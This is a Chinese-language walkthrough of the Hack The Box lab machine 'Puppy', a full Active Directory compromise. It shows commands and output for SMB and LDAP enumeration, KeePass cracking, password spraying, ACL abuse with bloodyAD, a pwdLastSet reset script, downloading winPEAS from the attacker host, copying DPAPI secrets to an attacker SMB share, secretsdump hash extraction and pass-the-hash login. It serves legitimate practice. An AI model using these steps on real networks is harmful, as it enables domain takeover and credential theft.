HTB - Puppy | CN-SEC 中文网

2025年6月3日09:32:41评论37 views字数 17606阅读58分41秒阅读模式

该公众号致力于分享各种工具和学习记录，与师傅共同进步 :)

机器信息

As is common in real life pentests, you will start the Puppy box with credentials for the following account: levi.james / KingofAkron2025!

信息收集

nmap

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        (generic dns response: SERVFAIL)
| fingerprint-strings: 
|   DNSVersionBindReqTCP: 
|     version
|_    bind
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-05-19 16:03:21Z)
111/tcp   open  rpcbind       2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/tcp6  rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  2,3,4        111/udp6  rpcbind
|   100003  2,3         2049/udp   nfs
|   100003  2,3         2049/udp6  nfs
|   100005  1,2,3       2049/udp   mountd
|   100005  1,2,3       2049/udp6  mountd
|   100021  1,2,3,4     2049/tcp   nlockmgr
|   100021  1,2,3,4     2049/tcp6  nlockmgr
|   100021  1,2,3,4     2049/udp   nlockmgr
|   100021  1,2,3,4     2049/udp6  nlockmgr
|   100024  1           2049/tcp   status
|   100024  1           2049/tcp6  status
|   100024  1           2049/udp   status
|_  100024  1           2049/udp6  status
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: PUPPY.HTB0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
2049/tcp  open  nlockmgr      1-4 (RPC #100021)
3260/tcp  open  iscsi?
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: PUPPY.HTB0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
49664/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
49670/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49685/tcp open  msrpc         Microsoft Windows RPC
50554/tcp open  msrpc         Microsoft Windows RPC
57096/tcp open  msrpc         Microsoft Windows RPC

探测smb

# 测试
➜  puppy crackmapexec smb 10.10.11.70 -u "levi.james" -p 'KingofAkron2025!'

SMB         10.10.11.70     445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:PUPPY.HTB) (signing:True) (SMBv1:False)
SMB         10.10.11.70     445    DC               [+] PUPPY.HTBlevi.james:KingofAkron2025!

# --shares 探测共享目录
➜  puppy crackmapexec smb 10.10.11.70 -u "levi.james" -p 'KingofAkron2025!' --shares

SMB         10.10.11.70     445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:PUPPY.HTB) (signing:True) (SMBv1:False)
SMB         10.10.11.70     445    DC               [+] PUPPY.HTBlevi.james:KingofAkron2025! 
SMB         10.10.11.70     445    DC               [+] Enumerated shares
SMB         10.10.11.70     445    DC               Share           Permissions     Remark
SMB         10.10.11.70     445    DC               -----           -----------     ------
SMB         10.10.11.70     445    DC               ADMIN$                          Remote Admin
SMB         10.10.11.70     445    DC               C$                              Default share
SMB         10.10.11.70     445    DC               DEV                             DEV-SHARE for PUPPY-DEVS
SMB         10.10.11.70     445    DC               IPC$            READ            Remote IPC
SMB         10.10.11.70     445    DC               NETLOGON        READ            Logon server share 
SMB         10.10.11.70     445    DC               SYSVOL          READ            Logon server share

# --users 探测用户
➜  puppy crackmapexec smb 10.10.11.70 -u "levi.james" -p 'KingofAkron2025!' --users 
SMB         10.10.11.70     445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:PUPPY.HTB) (signing:True) (SMBv1:False)
SMB         10.10.11.70     445    DC               [+] PUPPY.HTBlevi.james:KingofAkron2025! 
SMB         10.10.11.70     445    DC               [+] Enumerated domain user(s)
SMB         10.10.11.70     445    DC               PUPPY.HTBsteph.cooper_adm               badpwdcount: 2 desc: 
SMB         10.10.11.70     445    DC               PUPPY.HTBsteph.cooper                   badpwdcount: 3 desc: 
SMB         10.10.11.70     445    DC               PUPPY.HTBjamie.williams                 badpwdcount: 8 desc: 
SMB         10.10.11.70     445    DC               PUPPY.HTBadam.silver                    badpwdcount: 16 desc: 
SMB         10.10.11.70     445    DC               PUPPY.HTBant.edwards                    badpwdcount: 3 desc: 
SMB         10.10.11.70     445    DC               PUPPY.HTBlevi.james                     badpwdcount: 0 desc: 
SMB         10.10.11.70     445    DC               PUPPY.HTBkrbtgt                         badpwdcount: 3 desc: Key Distribution Center Service Account
SMB         10.10.11.70     445    DC               PUPPY.HTBGuest                          badpwdcount: 3 desc: Built-in account for guest access to the computer/domain
SMB         10.10.11.70     445    DC               PUPPY.HTBAdministrator                  badpwdcount: 4 desc: Built-in account for administering the computer/domain

这里的共享目录，DEV是自定义的，肯定要尝试连接，但是这里的DEV共享目录是没有权限读取的。

ldap & Bloodhound

# 先对齐时区
➜  data sudo ntpdate 10.10.11.70   
[sudo] yefeng 的密码：
2025-05-28 02:51:13.382298 (+0800) +23929.543638 +/- 0.104321 10.10.11.70 s1 no-leap
CLOCK: time stepped by 23929.543638
# bloodhound进行收集信息
➜  data bloodhound-python -d puppy.htb -dc dc.puppy.htb -c All -u levi.james -p KingofAkron2025!  -ns 10.10.11.70 --dns-timeout 10
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: puppy.htb
INFO: Getting TGT for user
INFO: Connecting to LDAP server: dc.puppy.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc.puppy.htb
INFO: Found 10 users
INFO: Found 56 groups
INFO: Found 3 gpos
INFO: Found 3 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: DC.PUPPY.HTB
INFO: Done in 00M 56S

经过分析，我们的[email protected]属于[email protected]，而[email protected]对于[email protected]有写入权限

尝试将[email protected]添加到DEVELOPERS组进行探测SMB共享

➜  puppy cat add_group.ldif
dn: CN=DEVELOPERS,DC=PUPPY,DC=HTB
changetype: modify
add: member
member: CN=Levi B. James,OU=MANPOWER,DC=PUPPY,DC=HTB
➜  puppy ldapmodify -x -H ldap://puppy.htb -D "[email protected]" -w 'KingofAkron2025!' -f add_group.ldif

modifying entry "CN=DEVELOPERS,DC=PUPPY,DC=HTB"

添加成功之后，通过cme查看对于DEV共享目录是否可读

➜  puppy crackmapexec smb dc.puppy.htb -u levi.james -p 'KingofAkron2025!' --shares

SMB         dc.puppy.htb    445    DC               DEV             READ            DEV-SHARE for PUPPY-DEVS

现在可读了，进行smbclient连接

➜  puppy smbclient \\10.10.11.70\DEV -U 'levi.james' 
Password for [WORKGROUPlevi.james]:
Try "help" to get a list of possible commands.
smb: > ls
  .                                  DR        0  Sun Mar 23 15:07:57 2025
  ..                                  D        0  Sun Mar  9 00:52:57 2025
  KeePassXC-2.7.9-Win64.msi           A 34394112  Sun Mar 23 15:09:12 2025
  Projects                            D        0  Sun Mar  9 00:53:36 2025
  recovery.kdbx                       A     2677  Wed Mar 12 10:25:46 2025

5080575 blocks of size 4096. 1647186 blocks available
smb: >

smbclient连接上之后，发现有recovery.kdbx文件

kdbx文件是一种数据库文件，可以通过KeePassXC打开，但大部分都是包含有密码的

思路：通过keepass2john将kdbx文件转换成哈希，然后通过john来进行爆破其中的密码

Keepass2john & John

注意这里的john版本问题( Linux自带的john版本可能过老而不包含keepass哈希的模式 )

大体解决方案：下载John的bleeding-jumbo版本，然后安装john的所有依赖，再进行编译

https://github.com/openwall/john

➜  puppy ls
hash  KeePassXC-2.7.9-Win64.msi  recovery.kdbx  reports

➜  puppy keepass2john ./recovery.kdbx > hash

➜  puppy john-jumbo hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (KeePass [AES/Argon2 256/256 AVX2])
Cracked 1 password hash (is in /home/yefeng/john-jumbo/run/john.pot), use "--show"
No password hashes left to crack (see FAQ)

➜  puppy john-jumbo hash --show                                            
recovery:liverpool

KeePassXC & Crackmapexec

通过KeepassXC打开kdbx数据库，很多个密码，但是用户名那一栏是空的，结合上面cme爆破出来的users进行比对

# 标题:密码
JAMIE WILLIAMSON : JamieLove2025!
ADAM SILVER : HJKL2025!
ANTONY C. EDWARDS : Antman2025!
STEVE TUCKER : Steve2025!
SAMUEL BLAKE : ILY2025!

# 用户
PUPPY.HTBsteph.cooper_adm
PUPPY.HTBsteph.cooper
PUPPY.HTBjamie.williams
PUPPY.HTBadam.silver
PUPPY.HTBant.edwards
PUPPY.HTBlevi.james
PUPPY.HTBkrbtgt
PUPPY.HTBGuest
PUPPY.HTBAdministrator

kerbrute爆破

➜  puppy kerbrute passwordspray --dc dc.puppy.htb -d puppy.htb user 'Antman2025!' -v

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ / ___/ __ / ___/ / / / __/ _ 
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|___/_/  /_.___/_/   __,_/__/___/                                        

Version: dev (n/a) - 05/28/25 - Ronnie Flathers @ropnop

2025/05/28 03:56:52 >  Using KDC(s):
2025/05/28 03:56:52 >  dc.puppy.htb:88

2025/05/28 03:56:52 >  [!] [email protected]:Antman2025! - USER LOCKED OUT
2025/05/28 03:56:52 >  [!] [email protected]:Antman2025! - USER LOCKED OUT
2025/05/28 03:56:52 >  [!] [email protected]:Antman2025! - USER LOCKED OUT
2025/05/28 03:56:52 >  [!] [email protected]:Antman2025! - Invalid password
2025/05/28 03:56:52 >  [!] [email protected]:Antman2025! - Invalid password
2025/05/28 03:56:52 >  [!] [email protected]:Antman2025! - Invalid password
2025/05/28 03:56:52 >  [!] [email protected]:Antman2025! - Invalid password
2025/05/28 03:56:52 >  [!] [email protected]:Antman2025! - Invalid password
2025/05/28 03:56:53 >  [+] VALID LOGIN: [email protected]:Antman2025!
2025/05/28 03:56:53 >  Done! Tested 9 logins (1 successes) in 1.750 seconds

在这里发现了adam.silver、Guest、krbtgt账号被锁住了

得到了一组的账号密码

PUPPY.HTBant.edwards:Antman2025!

都失败，获取的权限还是比较低的

在bloodhound中分析

ADAM.SILVER用户

这里我们可以获得ADAM用户

bloodyAD -d <域名> -u <用户名> -p <密码> --dc-ip <域控IP> <操作> <参数>
bloodyAD -d puppy.htb -u ant.edwards -p Antman2025! --dc-ip 10.10.11.70 remove uac -f LOCKOUT -f ACCOUNTDISABLE adam.silver
bloodyAD -d puppy.htb -u ant.edwards -p Antman2025! --dc-ip 10.10.11.70 set owner adam.silver ant.edwards
bloodyAD -d puppy.htb -u ant.edwards -p Antman2025! --dc-ip 10.10.11.70 set password adam.silver yefeng@123

➜  puppy bloodyAD -d puppy.htb -u ant.edwards -p Antman2025! --dc-ip 10.10.11.70 remove uac -f LOCKOUT -f ACCOUNTDISABLE adam.silver
[-] ['LOCKOUT', 'ACCOUNTDISABLE'] property flags removed from adam.silver's userAccountControl
➜  puppy bloodyAD -d puppy.htb -u ant.edwards -p Antman2025! --dc-ip 10.10.11.70 set owner adam.silver ant.edwards
[+] Old owner S-1-5-21-1487982659-1829050783-2281216199-512 is now replaced by ant.edwards on adam.silver
➜  puppy bloodyAD -d puppy.htb -u ant.edwards -p Antman2025! --dc-ip 10.10.11.70 set password adam.silver Adam@2025!

Traceback (most recent call last):
  File "/usr/bin/bloodyAD", line 8, in <module>
    sys.exit(main())
             ~~~~^^
  File "/usr/lib/python3/dist-packages/bloodyAD/main.py", line 201, in main
    output = args.func(conn, **params)
  File "/usr/lib/python3/dist-packages/bloodyAD/cli_modules/set.py", line 241, in password
    raise e
  File "/usr/lib/python3/dist-packages/bloodyAD/cli_modules/set.py", line 86, in password
    conn.ldap.bloodymodify(target, {"unicodePwd": op_list})
    ~~~~~~~~~~~~~~~~~~~~~~^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/lib/python3/dist-packages/bloodyAD/network/ldap.py", line 285, in bloodymodify
    raise err
msldap.commons.exceptions.LDAPModifyException: 
Password can't be changed before -2 days, 23:49:52.806422 because of the minimum password age policy.

最后一条修改密码的时候报错了，是由于 Active Directory 的“最小密码年龄策略”（Minimum Password Age） 导致的。

import ldap3

# 连接到 LDAP Server
server = ldap3.Server('10.10.11.70', port=389, use_ssl=False)
conn = ldap3.Connection(
    server,
    user='CN=ANTHONY J. EDWARDS,DC=PUPPY,DC=HTB',
    password='Antman2025!',
    auto_bind=True
)

# 修改 pwdLastSet 为 0（代表“从未设置密码”）
success = conn.modify(
'CN=ADAM D. SILVER,CN=USERS,DC=PUPPY,DC=HTB',
    {
'pwdLastSet': [(ldap3.MODIFY_REPLACE, [0])]
    }
)

# 输出结果
if success:
    print("[+] pwdLastSet 修改成功")
else:
    print("[-] 修改失败:", conn.result)

➜  puppy python setpassword.py 
[+] pwdLastSet 修改成功
➜  puppy ldapsearch -x -H ldap://puppy.htb -D "[email protected]" -w 'Antman2025!' -b "CN=Adam D. Silver,CN=Users,DC=PUPPY,DC=HTB" pwdLastSet

# extended LDIF
#
# LDAPv3
# base <CN=Adam D. Silver,CN=Users,DC=PUPPY,DC=HTB> with scope subtree
# filter: (objectclass=*)
# requesting: pwdLastSet 
#

# Adam D. Silver, Users, PUPPY.HTB
dn: CN=Adam D. Silver,CN=Users,DC=PUPPY,DC=HTB
pwdLastSet: 0

# search result
search: 2
result: 0 Success

# numResponses: 2
# numEntries: 1

➜  puppy bloodyAD -d puppy.htb -u ant.edwards -p Antman2025! --dc-ip 10.10.11.70 set password adam.silver yefeng@123
[+] Password changed successfully!

执行python脚本，成功修改为0，然后重新修改密码

evil-winrm & 信息收集

evil-winrm -i dc.puppy.htb -u adam.silver -p  'yefeng@123'

获取user.txt

➜  puppy evil-winrm -i dc.puppy.htb -u adam.silver -p  'yefeng@123'

Evil-WinRM shell v3.7

Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:Usersadam.silverDocuments> dir
*Evil-WinRM* PS C:Usersadam.silverDocuments> cd ..
*Evil-WinRM* PS C:Usersadam.silver> dir


    Directory: C:Usersadam.silver


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d-r---         2/28/2025  12:31 PM                3D Objects
d-r---         2/28/2025  12:31 PM                Contacts
d-r---         3/12/2025  12:09 PM                Desktop
d-r---          3/5/2025  10:16 AM                Documents
d-r---         2/28/2025  12:31 PM                Downloads
d-r---         2/28/2025  12:31 PM                Favorites
d-r---         2/28/2025  12:31 PM                Links
d-r---         2/28/2025  12:31 PM                Music
d-r---         2/28/2025  12:31 PM                Pictures
d-r---         2/28/2025  12:31 PM                Saved Games
d-r---         2/28/2025  12:31 PM                Searches
d-r---         2/28/2025  12:31 PM                Videos


*Evil-WinRM* PS C:Usersadam.silver> cd Desktop
*Evil-WinRM* PS C:Usersadam.silverDesktop> dir


    Directory: C:Usersadam.silverDesktop


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----         2/28/2025  12:31 PM           2312 Microsoft Edge.lnk
-ar---         5/27/2025  10:50 AM             34 user.txt

Invoke-WebRequest -Uri "http://10.10.16.69/winPEASx64.exe" -OutFile "C:Usersadam.silverDesktopwinPEASx64.exe"

执行该文件winPEASx64.exe

发现隐藏文件夹

解压之后，发现

steph.cooper : ChefSteph2025!

验证凭证成功

➜  puppy crackmapexec smb dc.puppy.htb -u steph.cooper -p 'ChefSteph2025!'       
SMB         dc.puppy.htb    445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:PUPPY.HTB) (signing:True) (SMBv1:False)
SMB         dc.puppy.htb    445    DC               [+] PUPPY.HTBsteph.cooper:ChefSteph2025!

DPAPI攻击

在自己的机器上先开smb共享

➜  puppy mkdir share    
➜  puppy impacket-smbserver share ./share -smb2support                                  
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed

将masterkey和凭据文件copy到我们开启的smb共享中

*Evil-WinRM* PS C:Users> cd C:Userssteph.cooperAppDataRoamingMicrosoftProtectS-1-5-21-1487982659-1829050783-2281216199-1107

*Evil-WinRM* PS C:Userssteph.cooperAppDataRoamingMicrosoftProtectS-1-5-21-1487982659-1829050783-2281216199-1107> copy .556a2412-1275-4ccf-b721-e6a0b4f90407 \10.10.16.69share

*Evil-WinRM* PS C:Userssteph.cooperAppDataRoamingMicrosoftProtectS-1-5-21-1487982659-1829050783-2281216199-1107> cd C:Userssteph.cooperAppDataRoamingMicrosoftCredentials

*Evil-WinRM* PS C:Userssteph.cooperAppDataRoamingMicrosoftCredentials> copy C8D69EBE9A43E9DEBF6B5FBD48B521B9 \10.10.16.69share

使用impacket-dpapi模块进行破解

➜  share impacket-dpapi masterkey -file 556a2412-1275-4ccf-b721-e6a0b4f90407 -password 'ChefSteph2025!' -sid S-1-5-21-1487982659-1829050783-2281216199-1107
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[MASTERKEYFILE]
Version     :        2 (2)
Guid        : 556a2412-1275-4ccf-b721-e6a0b4f90407
Flags       :        0 (0)
Policy      : 4ccf1275 (1288639093)
MasterKeyLen: 00000088 (136)
BackupKeyLen: 00000068 (104)
CredHistLen : 00000000 (0)
DomainKeyLen: 00000174 (372)

Decrypted key with User Key (MD4 protected)
Decrypted key: 0xd9a570722fbaf7149f9f9d691b0e137b7413c1414c452f9c77d6d8a8ed9efe3ecae990e047debe4ab8cc879e8ba99b31cdb7abad28408d8d9cbfdcaf319e9c84

➜  share impacket-dpapi credential -f C8D69EBE9A43E9DEBF6B5FBD48B521B9 -key 0xd9a570722fbaf7149f9f9d691b0e137b7413c1414c452f9c77d6d8a8ed9efe3ecae990e047debe4ab8cc879e8ba99b31cdb7abad28408d8d9cbfdcaf319e9c84
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[CREDENTIAL]
LastWritten : 2025-03-08 15:54:29
Flags       : 0x00000030 (CRED_FLAGS_REQUIRE_CONFIRMATION|CRED_FLAGS_WILDCARD_MATCH)
Persist     : 0x00000003 (CRED_PERSIST_ENTERPRISE)
Type        : 0x00000002 (CRED_TYPE_DOMAIN_PASSWORD)
Target      : Domain:target=PUPPY.HTB
Description : 
Unknown     : 
Username    : steph.cooper_adm
Unknown     : FivethChipOnItsWay2025!

尝试提取哈希

➜  share impacket-secretsdump steph.cooper_adm:'FivethChipOnItsWay2025!'@puppy.htb
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0xa943f13896e3e21f6c4100c7da9895a6
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:9c541c389e2904b9b112f599fd6b333d:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC 
PUPPYDC$:aes256-cts-hmac-sha1-96:f4f395e28f0933cac28e02947bc68ee11b744ee32b6452dbf795d9ec85ebda45
PUPPYDC$:aes128-cts-hmac-sha1-96:4d596c7c83be8cd71563307e496d8c30
PUPPYDC$:des-cbc-md5:54e9a11619f8b9b5
PUPPYDC$:plain_password_hex:84880c04e892448b6419dda6b840df09465ffda259692f44c2b3598d8f6b9bc1b0bc37b17528d18a1e10704932997674cbe6b89fd8256d5dfeaa306dc59f15c1834c9ddd333af63b249952730bf256c3afb34a9cc54320960e7b3783746ffa1a1528c77faa352a82c13d7c762c34c6f95b4bbe04f9db6164929f9df32b953f0b419fbec89e2ecb268ddcccb4324a969a1997ae3c375cc865772baa8c249589e1757c7c36a47775d2fc39e566483d0fcd48e29e6a384dc668228186a2196e48c7d1a8dbe6b52fc2e1392eb92d100c46277e1b2f43d5f2b188728a3e6e5f03582a9632da8acfc4d992899f3b64fe120e13
PUPPYDC$:aad3b435b51404eeaad3b435b51404ee:d5047916131e6ba897f975fc5f19c8df:::
[*] DPAPI_SYSTEM 
dpapi_machinekey:0xc21ea457ed3d6fd425344b3a5ca40769f14296a3
dpapi_userkey:0xcb6a80b44ae9bdd7f368fb674498d265d50e29bf
[*] NL$KM 
 0000   DD 1B A5 A0 33 E7 A0 56  1C 3F C3 F5 86 31 BA 09   ....3..V.?...1..
 0010   1A C4 D4 6A 3C 2A FA 15  26 06 3B 93 E0 66 0F 7A   ...j<*..&.;..f.z
 0020   02 9A C7 2E 52 79 C1 57  D9 0C D3 F6 17 79 EF 3F   ....Ry.W.....y.?
 0030   75 88 A3 99 C7 E0 2B 27  56 95 5C 6B 85 81 D0 ED   u.....+'V.k....
NL$KM:dd1ba5a033e7a0561c3fc3f58631ba091ac4d46a3c2afa1526063b93e0660f7a029ac72e5279c157d90cd3f61779ef3f7588a399c7e02b2756955c6b8581d0ed
[*] Dumping Domain Credentials (domainuid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:bb0edc15e49ceb4120c7bd7e6e65d75b:::

evil-winrm哈希登录

evil-winrm -i dc.puppy.htb -u Administrator -H 'bb0edc15e49ceb4120c7bd7e6e65d75b'

原文始发于微信公众号（夜风Sec）：HTB - Puppy

免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉。

左青龙
微信扫一扫

右白虎
微信扫一扫

HTB - Puppy

机器信息

信息收集

nmap

探测smb

ldap & Bloodhound

Keepass2john & John

KeePassXC & Crackmapexec

kerbrute爆破

ADAM.SILVER用户

evil-winrm & 信息收集

DPAPI攻击

云原生网络利器 Cilium 总览

实战 | 记一次几乎不可能成功的文件上传利用

Five86-1靶机渗透记录

渗透测试-条件竞争漏洞小结

深入浅出云原生环境信息收集技术（二）

httpx+naabu+nuclei大量资产极速漏扫

Linux提权（六）MYSQL UDF提权

从Git源码泄露审计到Getshell | DarkHole2

云原生背景下的应用安全建设

浅谈云原生环境信息收集技术

发表评论

在线咨询

微信